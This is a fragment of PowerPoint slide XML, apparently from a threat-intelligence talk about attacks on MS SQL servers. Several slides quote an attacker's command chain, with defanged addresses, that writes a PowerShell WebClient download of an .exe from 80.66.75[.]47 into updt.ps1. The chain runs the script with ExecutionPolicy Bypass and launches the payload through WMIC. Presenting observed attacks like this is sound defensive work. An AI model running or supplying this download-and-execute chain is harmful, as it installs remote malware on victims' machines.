                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBE8AF7C-446B-F441-AF53-E0C854C4C91D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928227" y="1888978"/>
              <a:ext cx="7279854" cy="2477128"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/C echo $cl = New-Object </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>System.Net.WebClient</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> &gt;%TEMP%\updt.ps1 &amp; echo $</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cl.DownloadFile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>hXXp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>://80[.]66.75]]]].40/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXXX.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xxxx.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &gt;&gt; %TEMP%\updt.ps1 &amp; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>powershell</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ExecutionPolicy</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> Bypass %TEMP%\updt.ps1 &amp; WMIC process call create </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"%TEMP%\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000" err="1">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>XXXXXXXX.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="2000">
                  <a:effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0"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</p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Graphic 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BB445C7-C501-D198-55B1-7209C7FD01E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322317" y="5808437"/>
            <a:ext cx="2286000" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="Group 156">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A198153B-E046-2E0C-155E-875A4026021A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3466755" y="526236"/>
            <a:ext cx="1205793" cy="1205793"/>
            <a:chOff x="9228675" y="2933048"/>
            <a:chExt cx="4118889" cy="4118889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38" name="Group 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50806D0E-6F5F-8BE6-01D7-1233E88D8AC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9228675" y="2933048"/>
              <a:ext cx="4118889" cy="4118889"/>
              <a:chOff x="7931149" y="2626295"/>
              <a:chExt cx="4118889" cy="4118889"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825C668A-81CB-463F-A357-228AE18F2A66}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11339954" y="3278140"/>
                <a:ext cx="522194" cy="527315"/>
                <a:chOff x="3190875" y="974570"/>
                <a:chExt cx="249325" cy="251770"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Rectangle 161">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A683408-4A22-AF01-DB95-1771C30360D6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Rectangle 162">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD02AB51-D9A7-9D35-1B0A-F17501941121}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Rectangle 163">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2CE5D8-F002-535C-E08B-03B0ABF9A7E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="48" name="Rectangle 164">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660EB8AC-5E6F-1A68-30D3-1C26B5414452}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="44" name="Graphic 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403DCE12-6EC6-5323-7A1D-B911703FFF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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7931149" y="2626295"/>
                <a:ext cx="4118889" cy="4118889"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Oval 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD5AFDD-7C68-20A5-4F7B-0EB5F18A1FA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10515933" y="4127841"/>
              <a:ext cx="1578270" cy="46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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257171" y="876096"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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812962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398477-39AB-F59C-6535-6EB6B8FBC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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{491A9D3F-724F-D541-49E4-740D7CEA2A3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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A47791-CE96-5BA2-4544-D56CD86D017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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55D76F6-0BF3-B749-5E12-530FE10E9B6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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E02AB1FA-C2E4-BAAB-06E7-5BCECA1AF2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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{554B40E0-34F9-FE5C-D3A2-F57F85E060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78127" y="-67586"/>
            <a:ext cx="13425772" cy="10189508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="122" name="Group 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C2F3403-83CB-D738-D062-819F4A5F6A1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="1953783"/>
            <a:ext cx="16459200" cy="3185521"/>
            <a:chOff x="914400" y="2120365"/>
            <a:chExt cx="16459200" cy="3185521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5DE94EF-9DFD-A40D-D31D-BEC72EFB67A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="914400" y="2120365"/>
              <a:ext cx="16459200" cy="3185521"/>
              <a:chOff x="9783551" y="1103017"/>
              <a:chExt cx="16459200" cy="3185521"/>
            </a:xfrm>
          </p:grpSpPr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7F8D15AC-F9D8-E090-9B0A-D1819382EC66}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9783551" y="1103017"/>
                <a:ext cx="16459200" cy="3185521"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 6307"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="424D56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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Graphic 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52125AE5-F9EB-1935-A526-C5FDFFBD80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rcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10126322" y="1300398"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CF16775-B201-51B8-BBF4-1C20E17F912D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9928226" y="1818602"/>
                <a:ext cx="16134415" cy="2395843"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pP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%SYSTEM%\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a: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”C:\Windows\\System32\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cmd.exe</a:t>
                </a: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” /C echo $cl = New-Object </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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System.Net.WebClient</a:t>
                </a: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&gt;C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; echo $</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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cl.DownloadFile</a:t>
                </a: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(“</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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hxxp</a:t>
                </a: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://80.66.75[.]47/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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Dxccaejs.exe</a:t>
                </a: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”, ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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tzt.bat</a:t>
                </a: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”) &gt;&gt; C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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powershell</a:t>
                </a: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–</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ExecutionPolicy</a:t>
                </a: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Bypass C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\updt.ps1 &amp; WMIC process call create ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1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ProgramData</a:t>
                </a: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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" kern="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="65000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:effectLst>
                      <a:glow rad="63500">
                        <a:schemeClr val="accent4">
                          <a:alpha val="40000"/>
                        </a:schemeClr>
                      </a:glow>
                    </a:effectLst>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>tzt.bat</a:t>
                </a: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”</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FFB5847-1EFD-01A9-6002-B4DE8A9BFC3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1862260" y="2244337"/>
              <a:ext cx="6098468" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Administrator: C:\\Windows\system32\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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60FF75E-2DA1-65F8-D75C-5C8CEF9C0150}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="5498673"/>
            <a:ext cx="7961243" cy="3873927"/>
            <a:chOff x="9783551" y="1103017"/>
            <a:chExt cx="7961243" cy="3873927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8451523C-C131-9E50-2388-C30DD97F1616}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9783551" y="1103017"/>
              <a:ext cx="7961243" cy="3873927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solidFill>
                <a:srgbClr val="424D5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14" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F00E644-80E6-EF91-EE66-B3A8F09721A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9928227" y="1888978"/>
              <a:ext cx="7279854" cy="2477128"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pP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/C echo $cl = New-Object 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System.Net.WebClient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&gt;%TEMP%\updt.ps1 &amp; echo $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cl.DownloadFile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(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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"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effectLst/>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>hXXp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effectLst/>
